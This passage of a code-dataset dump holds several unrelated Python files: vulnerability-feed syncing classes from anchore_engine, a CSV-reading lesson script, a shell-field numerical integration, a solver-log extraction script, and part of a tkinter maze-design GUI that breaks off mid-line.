db.rollback()\n\n\nclass FeedFactory(object):\n \"\"\"\n Factory class for creating feed objects. Not necessary yet because we don't have any dynamically updated feeds such that we\n don't exactly know the set of feeds nor do the group types change unexpectedly.\n\n \"\"\"\n override_mapping = {\n 'vulnerabilities': VulnerabilityFeed,\n 'packages': PackagesFeed,\n 'nvd': NvdFeed,\n 'snyk': SnykFeed,\n }\n\n default_mapping = AnchoreServiceFeed\n\n @classmethod\n def create(cls, feed_msg, src):\n \"\"\"\n Creates a new feed record and object from the received json\n :param feed_json:\n :return: DataFeed object\n \"\"\"\n record = FeedMetadata(name=feed_msg.name, description=feed_msg.description, access_tier=feed_msg.access_tier)\n obj = cls.get(record.name, record, src)\n return obj\n\n @classmethod\n def get(cls, name, record, src):\n \"\"\"\n Returns a feed instance for the given feed name based on mappings. If a specific mapping is found,\n it is used, else the generic feed object is used.\n\n :param name: name of the feed, should be unique across sources\n :return:\n \"\"\"\n try:\n clazz = cls.override_mapping.get(name)\n if clazz:\n return clazz(record, src=src)\n else:\n return cls.default_mapping(record, src=src)\n\n except KeyError:\n feed_obj = AnchoreServiceFeed(record, src=src)\n\n\nclass DataFeeds(object):\n _proxy = None\n _vulnerabilitiesFeed_cls = VulnerabilityFeed\n _packagesFeed_cls = PackagesFeed\n _nvdsFeed_cls = NvdFeed\n _snyksFeed_cls = SnykFeed\n\n def __init__(self):\n self.vuln_fn = None\n self.vuln_flush_fn = None\n\n @classmethod\n def instance(cls):\n if not cls._proxy:\n cls._proxy = DataFeeds()\n return cls._proxy\n\n def list_metadata(self):\n \"\"\"\n Returns a list of FeedMetadata objects populated with FeedGroupMetadata objects as returned by the db, but detached from the session.\n\n :return: list of FeedMetadata objects\n \"\"\"\n db = get_session()\n try:\n feeds = db.query(FeedMetadata).all()\n response = []\n for f in feeds:\n t = f.to_detached()\n t.groups = [g.to_detached() for g in f.groups]\n response.append(t)\n\n return response\n except Exception as e:\n log.exception('Could not get feed metadata')\n raise e\n finally:\n db.rollback()\n\n def records_for(self, feed_name, group_name):\n if feed_name == 'vulnerabilities':\n return self.vulnerabilities.record_count(group_name)\n elif feed_name == 'packages':\n return self.packages.record_count(group_name)\n elif feed_name == 'nvd':\n return self.nvd.record_count(group_name)\n elif feed_name == 'snyk':\n return self.snyk.record_count(group_name)\n else:\n return 0\n\n def refresh(self):\n \"\"\"\n Refresh listing of feeds. This is basically a no-op for now until we have dynamic feed schema detection since by\n design we only want to sync feeds we know about and have a data format for and those are enumerated.\n\n This function does verify that the expected feeds are available for a sync.\n :return: True on success, raise exception on failure to find a feed\n \"\"\"\n\n try:\n self.vulnerabilities.refresh_groups()\n except (InsufficientAccessTierError, InvalidCredentialsError) as e:\n log.error('Cannot update group metadata for vulnerabilities feed due to insufficient access or invalid credentials: {}'.format(e.message))\n\n try:\n self.packages.refresh_groups()\n except (InsufficientAccessTierError, InvalidCredentialsError) as e:\n log.error('Cannot update group metadata for packages feed due to insufficient access or invalid credentials: {}'.format(e.message))\n\n try:\n self.nvd.refresh_groups()\n except (InsufficientAccessTierError, InvalidCredentialsError) as e:\n log.error('Cannot update group metadata for Nvd feed due to insufficient access or invalid credentials: {}'.format(e.message))\n\n try:\n self.snyk.refresh_groups()\n except (InsufficientAccessTierError, InvalidCredentialsError) as e:\n log.error('Cannot update group metadata for snyk feed due to insufficient access or invalid credentials: {}'.format(e.message))\n\n def sync(self, to_sync=None, full_flush=False):\n \"\"\"\n Sync all feeds.\n :return:\n \"\"\"\n\n all_success = True\n\n result = []\n log.info('Performing feed sync of feeds: {}'.format('all' if to_sync is None else to_sync))\n\n # Initialize the feed metadata and groups first\n\n vuln_feed = None\n if to_sync is None or 'vulnerabilities' in to_sync:\n try:\n log.info('Syncing group metadata for vulnerabilities feed')\n vuln_feed = self.vulnerabilities\n vuln_feed.init_feed_meta_and_groups()\n except:\n log.exception('Cannot sync group metadata for vulnerabilities feed')\n vuln_feed = None\n\n pkgs_feed = None\n if to_sync is None or 'packages' in to_sync:\n try:\n log.info('Syncing group metadata for packages feed')\n pkgs_feed = self.packages\n pkgs_feed.init_feed_meta_and_groups()\n except:\n log.exception('Cannot sync group metadata for packages feed')\n pkgs_feed = None\n\n nvd_feed = None\n if to_sync is None or 'nvd' in to_sync:\n try:\n log.info('Syncing group metadata for nvd feed')\n nvd_feed = self.nvd\n nvd_feed.init_feed_meta_and_groups()\n except:\n log.exception('Cannot sync group metadata for nvd feed')\n nvd_feed = None\n\n snyk_feed = None\n if to_sync is None or 'snyk' in to_sync:\n try:\n log.info('Syncing group metadata for snyk feed')\n snyk_feed = self.snyk\n snyk_feed.init_feed_meta_and_groups()\n except:\n log.warn('Cannot sync group metadata for snyk feed, may not be available in the feed source')\n log.debug(traceback.format_exc())\n snyk_feed = None\n\n # Perform the feed sync next\n\n if vuln_feed:\n t = time.time()\n try:\n log.info('Syncing vulnerability feed')\n\n result.append(vuln_feed.sync(item_processing_fn=self.vuln_fn, full_flush=full_flush, flush_helper_fn=self.vuln_flush_fn))\n except:\n log.exception('Failure updating the vulnerabilities feed')\n all_success = False\n fail_result = build_feed_sync_results()\n fail_result['feed'] = vuln_feed.__feed_name__\n fail_result['total_time_seconds'] = time.time() - t\n result.append(fail_result)\n\n if pkgs_feed:\n t = time.time()\n try:\n log.info('Syncing packages feed')\n result.append(pkgs_feed.sync(full_flush=full_flush))\n except:\n log.exception('Failure updating the packages feed')\n all_success = False\n fail_result = build_feed_sync_results()\n fail_result['feed'] = pkgs_feed.__feed_name__\n fail_result['total_time_seconds'] = time.time() - t\n result.append(fail_result)\n\n if nvd_feed:\n t = time.time()\n try:\n log.info('Syncing nvd feed')\n result.append(nvd_feed.sync(full_flush=full_flush))\n except:\n log.exception('Failure updating the nvd feed')\n all_success = False\n fail_result = build_feed_sync_results()\n fail_result['feed'] = nvd_feed.__feed_name__\n fail_result['total_time_seconds'] = time.time() - t\n result.append(fail_result)\n\n if snyk_feed:\n t = time.time()\n try:\n log.info('Syncing snyk feed')\n result.append(snyk_feed.sync(item_processing_fn=self.vuln_fn, full_flush=full_flush, flush_helper_fn=self.vuln_flush_fn))\n except:\n log.exception('Failure updating the snyk feed')\n all_success = False\n fail_result = build_feed_sync_results()\n fail_result['feed'] = snyk_feed.__feed_name__\n fail_result['total_time_seconds'] = time.time() - t\n result.append(fail_result)\n\n if not all_success:\n raise Exception(\"one or more feeds failed to sync\")\n\n return result\n\n def bulk_sync(self, to_sync=None, only_if_unsynced=True):\n \"\"\"\n Sync all feeds using a bulk sync for each for performance, particularly on initial sync.\n :param to_sync: list of feed names to sync, if None all feeds are synced\n :return:\n \"\"\"\n\n all_success = True\n\n updated_records = {}\n\n if to_sync is None or 'vulnerabilities' in to_sync:\n if not only_if_unsynced or self.vulnerabilities.never_synced():\n log.info('Bulk syncing vulnerability feed')\n try:\n updated_records['vulnerabilities'] = self.vulnerabilities.bulk_sync()\n except Exception as err:\n log.exception('Failure updating the vulnerabilities feed. Continuing with next feed')\n all_success = False\n\n else:\n log.info('Skipping bulk sync since feed already initialized')\n\n if to_sync is None or 'packages' in to_sync:\n if not only_if_unsynced or self.packages.never_synced():\n try:\n log.info('Syncing packages feed')\n updated_records['packages'] = self.packages.bulk_sync()\n except Exception as err:\n log.exception('Failure updating the packages feed. Continuing with next feed')\n all_success = False\n\n else:\n log.info('Skipping bulk sync since feed already initialized')\n\n if to_sync is None or 'nvd' in to_sync:\n if not only_if_unsynced or self.nvd.never_synced():\n try:\n log.info('Syncing nvd feed')\n updated_records['nvd'] = self.nvd.bulk_sync()\n except Exception as err:\n log.exception('Failure updating the nvd feed. Continuing with next feed')\n all_success = False\n\n else:\n log.info('Skipping bulk sync since feed already initialized')\n\n if to_sync is None or 'snyk' in to_sync:\n if not only_if_unsynced or self.snyk.never_synced():\n try:\n log.info('Syncing snyk feed')\n updated_records['snyk'] = self.snyk.bulk_sync()\n except Exception as err:\n log.exception('Failure updating the snyk feed. Continuing with next feed')\n all_success = False\n\n else:\n log.info('Skipping bulk sync since feed already initialized')\n\n\n if not all_success:\n raise Exception(\"one or more feeds failed to sync\")\n\n return updated_records\n\n @property\n def vulnerabilities(self):\n return self._vulnerabilitiesFeed_cls()\n\n @property\n def packages(self):\n return self._packagesFeed_cls()\n\n @property\n def nvd(self):\n return self._nvdsFeed_cls()\n\n @property\n def snyk(self):\n return self._snyksFeed_cls()\n","sub_path":"anchore_engine/services/policy_engine/engine/feeds.py","file_name":"feeds.py","file_ext":"py","file_size_in_byte":66136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"367380575","text":"\"\"\"\nReading csv file into some data-structure and perform some calculation\n\"\"\"\nimport csv\nfrom conf.read_conf import read_config\n\n\ndef reading_csv(filename, errors=\"warn\"):\n \"\"\"\n Read csv files and store it into dict\n \"\"\"\n\n # ----checking for value error\n if errors not in {'warn', 'raise', 'silent'}:\n raise ValueError(\"erros must be one of 'warn', 'raise', 'silent'\")\n\n # ----list\n records = []\n\n # ----reading csv file\n with open(filename, \"r\") as f:\n rows = csv.reader(f)\n next(rows) # ----skip header\n for rowno, row in enumerate(rows, start=1):\n try:\n row[2] = int(row[2])\n row[3] = float(row[3])\n except Exception as err:\n if errors == \"warn\":\n print('row: ', rowno, 'bad row: ', row)\n print('row: ', rowno, 'Reason: ', err)\n elif errors == \"raise\":\n raise SystemExit(\"Error: \", err)\n else:\n pass # ----ignore\n\n # ----dict\n record = {\n \"name\": row[0],\n \"date\": row[1],\n \"share\": row[2],\n \"price\": row[3]\n }\n # ----append\n records.append(record)\n\n return records\n\n\nif __name__ == '__main__':\n\n # ----reading conf\n home = read_config()\n\n # ----csv file\n data = reading_csv(home + \"Data/profile.csv\")\n\n total = 0.0\n # ----loop through records by unpacking\n for line in data:\n total += line[\"share\"] * line[\"price\"] # ----shares * price\n\n print(\"total: \", total)\n","sub_path":"lesson_5/practical/reading_csv_with_dict.py","file_name":"reading_csv_with_dict.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"281901672","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\nnpt=np.int(1e4)\ntheta=np.linspace(0,np.pi,npt)\ndtheta=np.median(np.diff(theta))\nr=1.0\nzvec=np.linspace(0,2,100)\nf=np.zeros(len(zvec))\nfor i,z in enumerate(zvec):\n numerator=(z-r*np.cos(theta))*np.sin(theta)\n denom=(z**2+r**2-2*r*z*np.cos(theta))**1.5\n f[i]=0.5*np.sum(numerator/denom)*dtheta\n\nplt.clf()\nplt.plot(zvec,f,linewidth=4.0)\npred=0*zvec\npred[zvec>r]=zvec[zvec>r]**-2\nplt.plot(zvec,pred,'--')\nplt.legend(['Numerical Result','Prediction'])\nplt.savefig('shell_field.png')\n\n\n\n\n","sub_path":"lecture_3/shell_integral.py","file_name":"shell_integral.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"227390916","text":"import sys, getopt, os, re\ninputfile = sys.argv[1]\n\nf = open(inputfile)\nalltext = f.read()\nlines = alltext.splitlines()\n\nlogE = 0.43429448190325182765112891\ninf = 9999999999999999\n\nmarker1, marker2 = -1, -1\n\nlinenum = 0\npre_time = 0\n\nfor linenum, line in enumerate(lines):\n\tif 'Initialization complete' in line:\n\t\tpre_time = float(line.split()[-2])\n\tif 'Starting search' in line:\n\t\tmarker1 = linenum + 1\n\tif 'Search done' in line:\n\t\tmarker2 = linenum - 3\n\nif marker2 == -1:\n\tmarker2 = linenum\n\n# print(marker2, marker1)\n\nif marker1 == -1:\n\tif 'Solved during initialization' in alltext:\n\t\tfor k, t in enumerate([10, 60, 600, 3600, 10800, 21600]):\n\t\t\tfo = open('extracted/'+sys.argv[2]+'-'+sys.argv[3]+'-i'+sys.argv[4]+'-'+sys.argv[5]+'-t'+str(t)+'.ext', 'w')\n\t\t\tprint(str(inf)+' '+str(inf)+' '+str(inf)+' '+str(pre_time), file = fo)\n\t\t\tfo.close()\n\n\telse:\n\t\tfor k, t in enumerate([10, 60, 600, 3600, 10800, 21600]):\n\t\t\tfo = open('extracted/'+sys.argv[2]+'-'+sys.argv[3]+'-i'+sys.argv[4]+'-'+sys.argv[5]+'-t'+str(t)+'.ext', 'w')\n\t\t\tprint(str(inf)+' '+str(inf)+' '+str(inf)+' '+str(inf), file = fo)\n\t\t\tfo.close()\n\nelif marker2 - marker1 < 0:\n\tfor k, t in enumerate([10, 60, 600, 3600, 10800, 21600]):\n\t\tfo = open('extracted/'+sys.argv[2]+'-'+sys.argv[3]+'-i'+sys.argv[4]+'-'+sys.argv[5]+'-t'+str(t)+'.ext', 'w')\n\t\tprint(str(inf)+' '+str(inf)+' '+str(inf)+' '+str(inf), file = fo)\n\t\tfo.close()\n#\tprint('& Out of memory & No solution & & & & & \\\\\\\\')\n\n\nelse:\n\trows = marker2 - marker1 + 1\n\ttime = ['x'] * rows\n\tornodes = ['x'] * rows\n\tandnodes = ['x'] * rows\n\tweight = ['x'] * rows\n\tcost = ['x'] * rows\n\tuw = ['x'] * rows\n\n\tfor i in range(marker1, marker2 + 1):\n\t\ttime[i - marker1] = float(re.findall('[0-9]+\\.[0-9]*', re.findall('\\[.*\\]', lines[i])[0])[0]) + pre_time\n\t\trow = lines[i].split()\n\t\tfor j, k in enumerate(row):\n\t\t\tif k == 'w' or k == 'u':\n\t\t\t\tbreak\n\t\tuw[i - marker1] = row[j]\n\t\tweight[i - marker1] = float(row[j + 1])\n\t\tornodes[i - marker1] = float(row[j + 2])\n\t\tandnodes[i - marker1] = float(row[j + 3])\n\t\tcost[i - marker1] = '{0:.4f}'.format(float(row[j + 4])*logE)\n\tj = 0\n\tcols = [0] * 6\n\tlabels = ['Cost', 'Nodes', 'Weight', 'Time']\n\tfor i, t in enumerate([10.0, 60.0, 600.0, 3600.0, 10800.0, 21600.0]):\n\t\twhile j < rows:\n\t\t\tif uw[j] == 'u':\n\t\t\t\tj += 1 \n\t\t\t\tcontinue\n\t\t\tif time[j] > t:\n\t\t\t\tif j > 0: \n\t\t\t\t\tj -= 1\n\t\t\t\tbreak\n\t\t\tj += 1\n\t\tif j < rows:\n\t\t\tcols[i] = [cost[j], ornodes[j] + andnodes[j], weight[j], time[j]]\n\tfor i, c in enumerate(cols):\n\t\tif c == 0:\n\t\t\tcols[i] = [cost[rows-1], ornodes[rows-1]+andnodes[rows-1], weight[rows-1], time[rows-1]]\n\n\tfor k, t in enumerate([10, 60, 600, 3600, 10800, 21600]):\n\t\tdat = ''\n\t\tfor j in range(0, 4):\n\t\t\tdat += str(cols[k][j]) + ' '\n\t\tfo = open('extracted/'+sys.argv[2]+'-'+sys.argv[3]+'-i'+sys.argv[4]+'-'+sys.argv[5]+'-t'+str(t)+'.ext', 'w')\n\t\t# filename example: extracted/jglp-pedigree20-i18-araobf-t600.ext\n\t\tprint(dat, file = fo)\n\t\tfo.close()\n","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"253005739","text":"import tkinter as tk\nfrom tkinter import *\nimport numpy as np\nimport itertools as it\nfrom tkinter import filedialog\nfrom os import listdir\nfrom os.path import isfile, join\nimport re\nfrom serialcontrol import serial_ports, setup_ser\nimport time\nimport platform\n\n\nclass GUI:\n \"\"\"\n =================================================================================================\n =================================================================================================\n Functions\n =================================================================================================\n =================================================================================================\n \"\"\"\n \"\"\" DRAWING ON CANVAS \"\"\"\n # User interaction with canvas\n def canvas_editing_interactions(self, eventorigin):\n \"\"\"\n :param eventorigin:\n :return:\n\n Allows the user to draw the maze's platforms on the canvas and to assign bridge and servos ID to the maze parts\n \"\"\"\n # Get mouse click coordinates\n global x, y\n x = eventorigin.x\n y = eventorigin.y\n\n if self.drawingcheck_var: # If we are drawing and not assigning IDs\n if not self.assigningbridges and not self.assigningservos:\n if not self.placingsheleter:\n if not self.drawing_br_checkbtn_var.get(): # We are not manually drawing one bridge\n # Draw platform and guide lines\n self.c.create_line(x, y, x+500, y+500, fill='gray', tags=\"guideline\")\n self.c.create_line(x, y, x+500, y-500, fill='gray', tags=\"guideline\")\n self.c.create_line(x, y, x-500, y+500, fill='gray', tags=\"guideline\")\n self.c.create_line(x, y, x-500, y-500, fill='gray', tags=\"guideline\")\n self.c.create_line(x, y, x+500, y, fill='gray', tags=\"guideline\")\n self.c.create_line(x, y, x-500, y, fill='gray', tags=\"guideline\")\n self.c.create_line(x, y, x, y+500, fill='gray', tags=\"guideline\")\n self.c.create_line(x, y, x, y-500, fill='gray', tags=\"guideline\")\n\n radius = 50\n self.c.create_oval(x-radius, y-radius, x+radius, y+radius, outline=\"black\",\n fill=\"green\", width=2, tags=\"platform\")\n else:\n # Append click coordinates to list and draw bridge\n self.manualbr_coords.append((x,y))\n if len(self.manualbr_coords)>1:\n prev_p = self.manualbr_coords[-2]\n curr_p = self.manualbr_coords[-1]\n self.c.create_line(prev_p[0], prev_p[1],\n curr_p[0], curr_p[1], width=30, fill='green', tag=\"bridge_part\")\n\n else:\n # Draw shelter and toggle shelter button\n item = self.c.find_closest(eventorigin.x, eventorigin.y)[0]\n if self.c.gettags(item)[0] == 'platform':\n self.c.create_rectangle(x-20, y+20, x+20, y-20, fill='blue')\n self.shelterbtn.config(relief=\"raised\")\n self.placingsheleter = False\n print('Added shelter to platform')\n else:\n print(' Please place shelter on platform')\n else:\n # Control the assigning of bridge and servos ID\n item = self.c.find_closest(eventorigin.x, eventorigin.y)[0] # get closest canvas item to click\n if self.assigningbridges:\n # Assign bridge ID if clicked on a bridge\n if self.c.gettags(item)[0] == 'bridge' or self.c.gettags(item)[0] == 'bridge_part':\n sel_id = self.bridgeslist.curselection() # Get bridge ID from bridges list, update list\n if sel_id:\n self.c.create_line(x - 75, y, x + 75, y, width=30, fill='bisque2')\n self.c.create_text(x, y, text=self.bridgeslist.get(sel_id), font=(\"bold\", 14),\n tag=(self.bridgeslist.get(sel_id), 'bridge_label'))\n\n self.c.itemconfig(item, tags=self.bridgeslist.get(sel_id))\n self.bridgeslist.delete(sel_id)\n self.bridgeslist.select_set(0)\n if not self.bridgeslist.get(0):\n self.bridgeslist.insert(END, 'Assigned all bridges....')\n self.toggle_bridges()\n self.toggle_servos()\n self.servoslist.select_set(0)\n\n else:\n print('Please select bridge from the list')\n else:\n print('Please click on a bridge')\n else:\n sel_id = self.servoslist.curselection()\n if not sel_id:\n return\n\n # If we have a servo selected, assigning servos to bridge label\n if self.c.gettags(item)[1] == 'bridge_label' or self.c.gettags(item)[1] == 'bridge_label_2':\n # Check if it is the first or second servo we are adding\n if self.c.gettags(item)[1] == 'bridge_label':\n curr = self.c.gettags(item)\n self.c.itemconfig(item, tags=(curr[0], 'bridge_label_2'))\n xoffset = -75\n elif self.c.gettags(item)[1] == 'bridge_label_2':\n xoffset = 0\n\n # assign servo id to variables that stores servos numbs\n br_id = self.c.itemcget(item, 'text')\n ser_num = int(self.servoslist.get(sel_id)[-1])\n\n if br_id in self.servos_bridges_d:\n temp = self.servos_bridges_d[br_id]\n temp.append(ser_num)\n self.servos_bridges_d[br_id] = temp\n\n else:\n self.servos_bridges_d[br_id] = [ser_num]\n\n # Update lists and place tags on canvas\n sel_coord = self.c.coords(item)\n if sel_id:\n self.c.create_line(sel_coord[0]+xoffset, sel_coord[1]+22,\n sel_coord[0]+75+xoffset, sel_coord[1]+22,\n width=20, fill='bisque3', tag=('servo_name', self.servoslist.get(sel_id)[-1]))\n\n self.c.create_text(sel_coord[0]+37+xoffset, sel_coord[1]+22, text=self.servoslist.get(sel_id)[-1], font=(\"bold\", 12))\n\n self.servoslist.delete(sel_id)\n self.servoslist.select_set(0)\n if not self.servoslist.get(0):\n self.servoslist.insert(END, 'Assigned all servos....')\n self.toggle_servos()\n\n else:\n print('Please click on a bridge label')\n\n def nextbr_b(self):\n servos_l = []\n\n # Update widget list, bridges and servos lists\n self.bridges_count += 1\n if self.bridges_count == 1:\n self.bridgeslist.delete(END)\n self.servoslist.delete(END)\n self.bridgeslist.insert(END, \"Bridge_{}\".format(self.bridges_count))\n self.bridges_l.append(\"Bridge_{}\".format(self.bridges_count))\n\n servos_l.append(\"Servo_{}\".format((self.bridges_count * 2) - 1))\n servos_l.append(\"Servo_{}\".format(self.bridges_count * 2))\n [self.servoslist.insert(END, s) for s in servos_l]\n\n self.manualbr_coords = []\n\n # Draw maze on canvas, create objects lists, add to lists widgets\n def draw_maze(self):\n \"\"\"\n Gets called by draw maze button, removes gidelines and draws bridges lines\n Also produces a list of items on canvas\n \"\"\"\n platfs_count = 0\n servos_l = []\n\n # Delete not platforms items on canvas\n displayed, platfs_count, self.platfs_coords, self.platfs_l = self.deletefromcanvas_nontag('guideline',\n True, 'platform')\n\n if displayed:\n # Draw all possible bridges [might need something more sophisticated here]\n all_combinations = list(it.combinations(self.platfs_coords, 2))\n for comb in all_combinations:\n # Draw a bridge connecting the platforms\n self.c.create_line(comb[0][0], comb[0][1],\n comb[1][0], comb[1][1], width=30, fill='green', tag=\"bridge\")\n\n # Store coordinates in list\n self.bridges_count += 1\n self.bridges_l.append(\"Bridge_{}\".format(self.bridges_count))\n self.bridges_coords.append((comb[0][0], comb[0][1], comb[1][0], comb[1][1]))\n\n servos_l.append(\"Servo_{}\".format((self.bridges_count * 2) - 1))\n servos_l.append(\"Servo_{}\".format(self.bridges_count * 2))\n\n # Toggle bridges\n self.toggle_bridges()\n\n # add everything to the relevant lists widgets\n self.edit_listswidgs(self.bridges_l, self.bridgeslist)\n self.edit_listswidgs(servos_l, self.servoslist)\n self.bridgeslist.select_set(0)\n\n \"\"\" ELIMINATING OBJECTS FROM CANVAS \"\"\"\n # Eliminate single items from canvas [right-click event]\n def del_obj(self, eventorigin):\n item = self.c.find_closest(eventorigin.x, eventorigin.y)[0]\n self.c.delete(item)\n\n # Clear everything from canvas and lists widgets, reset variables\n def clear_maze(self):\n # Delete everything from canvas, toggle buttons, edit lists\n self.servos_bridges_d = {}\n\n self.c.delete(\"all\")\n\n # Clear lists widgets and variables\n self.bridgeslist.delete(0, END)\n self.bridgeslist.insert(END, \"Draw a maze...\")\n self.servoslist.delete(0, END)\n self.servoslist.insert(END, \"Draw a maze...\")\n\n self.servos_bridges_d = {}\n self.platfs_coords, self.bridges_coords = [], []\n self.platfs_l, self.bridges_l = [], []\n\n # Toggle buttons\n if self.assigningbridges:\n self.toggle_bridges()\n if self.placingsheleter:\n self.toggle_shelter()\n if self.assigningservos:\n self.toggle_servos()\n\n \"\"\" Auxiliary functions \"\"\"\n def deletefromcanvas_nontag(self, *args):\n # Initialise variables\n elimtag = args[0]\n objcount = 0\n objcoordslist = []\n objlist = []\n\n # Check if we want to extract the coordinates\n if args[1]:\n returncoords = True\n recordtag = args[2]\n else:\n returncoords = False\n recordtag = ''\n\n # Delete items and return coordinates\n displayed = self.c.find_all()\n if displayed:\n for d in displayed:\n if self.c.gettags(d)[0] != elimtag:\n if returncoords and self.c.gettags(d)[0] == recordtag:\n objcount += 1\n # Get coords\n coord_l = self.c.coords(d)\n dx = coord_l[2] - np.int((coord_l[2] - coord_l[0]) / 2)\n dy = coord_l[3] - np.int((coord_l[3] - coord_l[1]) / 2)\n objcoordslist.append((dx, dy))\n objlist.append(\"Platform_{}\".format(objcount))\n else:\n self.c.delete(d)\n return displayed, objcount, objcoordslist, objlist\n\n def edit_listswidgs(self, items_list, list_widget):\n # Adds items to list widget\n list_widget.delete(0, END)\n for item in items_list:\n list_widget.insert(END, item)\n\n def plot_loaded(self, plotting_dict): # plot loaded data and assign tags to editor lists\n for (k,v) in sorted(plotting_dict.items()):\n if k == 'bridges_coords':\n for idx,coord in enumerate(v):\n try:\n tg_id = int(plotting_dict['bridges_tags'][idx][0])\n tg = 'Bridge_' + str(tg_id)\n drawlbl = True\n except:\n tg = 'bridge_part'\n drawlbl = False\n pass\n self.c.create_line(coord[0], coord[1],\n coord[2], coord[3], width=30, fill='green', tag=tg)\n\n if drawlbl:\n if self.avail_bridgeslist.get(0) == 'No unassigned bridges...':\n self.avail_bridgeslist.delete(0,END)\n self.avail_bridgeslist.insert(END, tg)\n\n # Get coords to place labels in the correct place\n (x, y) = ((coord[0] + coord[2])/2, (coord[1] + coord[3])/2)\n y += 25\n x -= 30\n self.c.create_line(x - 75, y, x + 60, y, width=30, fill='AntiqueWhite3')\n self.c.create_text(x - 30, y, text=tg, font=(\"bold\", 12))\n\n # Draw servo labels\n self.c.create_line(x + 15, y, x + 60, y, width=30, fill='AntiqueWhite2')\n xoffset = 30\n for s in self.servos_bridges[tg_id-1, :]:\n s_id = int(s)\n self.c.create_text(x + xoffset, y,\n text=s_id, font=(\"bold\", 10))\n xoffset += 20\n\n self.c.update()\n elif k == 'platforms_coordinates':\n for coord in v:\n self.c.create_oval(coord[0], coord[1], coord[2], coord[3], outline=\"black\",\n fill=\"green\", width=2, tags=\"platform\")\n self.c.update()\n\n # Edit list entry\n def edit_list_entry(self, event):\n # Get item to be edited\n cursel_listpos = event.widget.curselection()[0]\n cursel = event.widget.get(cursel_listpos)\n cursel_noid = cursel.split('_')[0]\n print('Currently selected entry: ' + cursel + '\\n')\n\n # Get new ID to be assigned from user input\n newid = input('Please Enter new ID number')\n newentry = '{}_{}'.format(cursel_noid, newid)\n\n # Check if other items have the same number\n allinlist = event.widget.get(0, END)\n allinlist = [x for x in allinlist]\n if not newentry in allinlist:\n print('New edited entry: ' + newentry + '\\n')\n else:\n print('Another item has the same ID, be careful!')\n print('New edited entry: ' + newentry + '\\n')\n\n event.widget.delete(cursel_listpos)\n event.widget.insert(cursel_listpos, newentry)\n event.widget.select_set(cursel_listpos)\n\n # Move bridges across lists in the control panel\n def assign_br(self, event):\n try:\n cursel = self.avail_bridgeslist.get(self.avail_bridgeslist.curselection())\n if self.assigned_bridgeslist.get(0) == 'No assigned briges...':\n self.assigned_bridgeslist.delete(0, END)\n\n self.assigned_bridgeslist.insert(END, str(cursel))\n self.avail_bridgeslist.delete(self.avail_bridgeslist.curselection()[0])\n\n all_oncanv = self.c.find_all()\n for oncanv in all_oncanv:\n if self.c.gettags(oncanv):\n if self.c.gettags(oncanv)[0] == cursel:\n self.c.itemconfig(oncanv, fill=\"orange\")\n except:\n pass\n\n def remove_assigned_br(self, event):\n try:\n cursel = self.assigned_bridgeslist.get(self.assigned_bridgeslist.curselection())\n self.avail_bridgeslist.insert(END, str(cursel))\n self.assigned_bridgeslist.delete(self.assigned_bridgeslist.curselection()[0])\n except:\n pass\n\n \"\"\" LOAD and SAVE \"\"\"\n # Load design into control panel\n def design_ready(self):\n # Create array stating which servos are assigned to which bridges\n self.servos_bridges = np.zeros((len(self.servos_bridges_d), 2))\n for (k, v) in self.servos_bridges_d.items():\n k_id = int(k[-1]) - 1\n self.servos_bridges[k_id, :] = v\n\n # Get lists of available bridges\n allitems = self.c.find_all()\n for it in allitems:\n tg = self.c.gettags(it)[0]\n if tg:\n if tg[0:6] == 'Bridge':\n if self.avail_bridgeslist.get(0) == 'No unassigned bridges...':\n self.avail_bridgeslist.delete(0, END)\n self.avail_bridgeslist.insert(END, tg)\n\n # Enable session start btn\n self.sesscontrolbtn['state'] = ACTIVE\n self.sesscontrolbtn['bg'] = 'green2'\n\n # Save button function\n def save_b(self):\n # Set up array with servos ID associated to bridges\n servos_bridges = np.zeros((len(self.servos_bridges_d), 2))\n for (k,v) in self.servos_bridges_d.items():\n k_id = int(k[-1])-1\n servos_bridges[k_id, :] = v\n\n # check that we have all the data necessary to save stuff\n saveok = True\n if len(servos_bridges) == 0:\n print('Please draw a maze and assign bridges/servos first')\n saveok = False\n\n mazename = self.mazename.get()\n if mazename == 'Enter maze name... [Decisi-o-nator_3000]':\n print('Please give a name to your maze')\n saveok = False\n\n if saveok:\n # Get save path\n save_folder = filedialog.askdirectory()\n servos_bridges_name = '{}/{}_bridges-servos'.format(save_folder, mazename)\n canvas_name = '{}/{}_canvas'.format(save_folder, mazename)\n\n # Save servo/bridges info into numpy array [which servo is assigned to which bridge]\n np.save(servos_bridges_name, servos_bridges)\n self.c.postscript(file=canvas_name, colormode='color')\n\n # Save coords of items on canvas\n allitems = self.c.find_all()\n platfs_coordsl, bridges_coordsl, brtags_coordsl, servostags_coordsl = [], [], [], []\n bridges_tagsl, servos_tagsl = [], []\n for obj in allitems:\n if self.c.gettags(obj):\n obj_tag = self.c.gettags(obj)[0]\n if len(self.c.gettags(obj)) >1:\n obj_tag2 = self.c.gettags(obj)[1]\n else:\n obj_tag2 = ''\n obj_coord = self.c.coords(obj)\n\n if obj_tag == 'platform':\n platfs_coordsl.append(obj_coord)\n elif obj_tag[0:6] == 'Bridge' or obj_tag == 'bridge_part':\n if obj_tag2:\n brtags_coordsl.append(obj_coord) # It means that this is a bridge tag not a bridge\n else:\n bridges_coordsl.append(obj_coord)\n if obj_tag[0:6] == 'Bridge':\n bridges_tagsl.append([obj_tag])\n else:\n servostags_coordsl.append(obj_coord)\n servos_tagsl.append([obj_tag2])\n\n # we save location of platform circles, bridges line and text labels to later replot the maze if necessary\n # we don't save what's sotered in servo labels as we can infer that from servos_bridges given that we know\n # where the bridges are in an ordered list\n\n # Arrange all data to be saved into one dictionary, then save it to text file\n dict_to_save = {'platforms_coordinates': platfs_coordsl, 'bridges_tags': bridges_tagsl,\n 'bridges_tags_coords': brtags_coordsl, 'bridges_coords': bridges_coordsl,\n 'servos_tags': servos_tagsl,\n 'servos_tags_coords': servostags_coordsl}\n\n with open('{}/{}_canvas_items_coords.txt'.format(save_folder, mazename), 'w') as out:\n for (k, v) in 